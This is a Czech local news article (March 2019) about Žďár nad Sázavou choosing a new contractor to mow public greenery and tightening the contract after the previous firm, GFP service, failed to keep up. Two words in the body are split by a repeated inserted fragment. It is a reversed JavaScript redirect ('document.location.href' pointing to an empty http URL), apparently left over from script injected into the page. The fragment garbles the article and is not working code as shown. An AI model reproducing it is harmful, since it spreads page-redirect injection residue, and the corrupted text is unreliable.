Rainbow page separator

Ve Žďáře vybrali nového dodavatele sečení veřejné zeleně

Neděle, 31. března 2019

Žďár nad Sázavou / Nového dodavatele sečení veřejné zeleně vybrala žďárská radnice. Zajišťovat ho bude firma Josefa Řádka z Ostrova nad Oslavou, která byla vybrána hodnotící komisí a následně schválena radními jako nejvhodnější z uchazečů. Změn doznaly také podmínky, za kterých bude sečení zeleně na území Žďáru prováděno, zejména upřesnění povinností či porušení smlouvy, předpokládaný harmonogram prací či zkrácení výpovědní lhůty bez udání důvodu z dvanácti na tři měsíce, přičemž v případě hrubého opakovaného porušení smlouvy je možná výpověď okamžitá. Za předpokladu, že by dodavatel smlouvu neplnil, má měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to možnost bez dalšího výběrového řízení vyzvat v pořadí druhého nejúspěšnějšího účastníka konkurzu k uzavření smlouvy.
Změnami ve smlouvě se vedení Žďáru jistí před dalším fiaskem, které nastalo po výběru předchozího – nejlevnějšího – dodavatele sečení veřejné zeleně, jenž byl vybrán v roce 2016. V průběhu roku 2017 se ale na sekáče z pražské firmy GFP service snesla mohutná kritika ze strany žďárských obyvatel, neboť firma byla neustále v časovém skluzu, jelikož nedisponovala dostatkem techniky i zaměstnanců, a trávu nestíhala v daných termínech posekat. Za nesplnění smluvních podmínek opakovaně zaplatila několik pokut, a pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tože ani v roce 2018 její produktivita práce nebyla lepší, došlo na dohodnuté ukončení smluvního vztahu.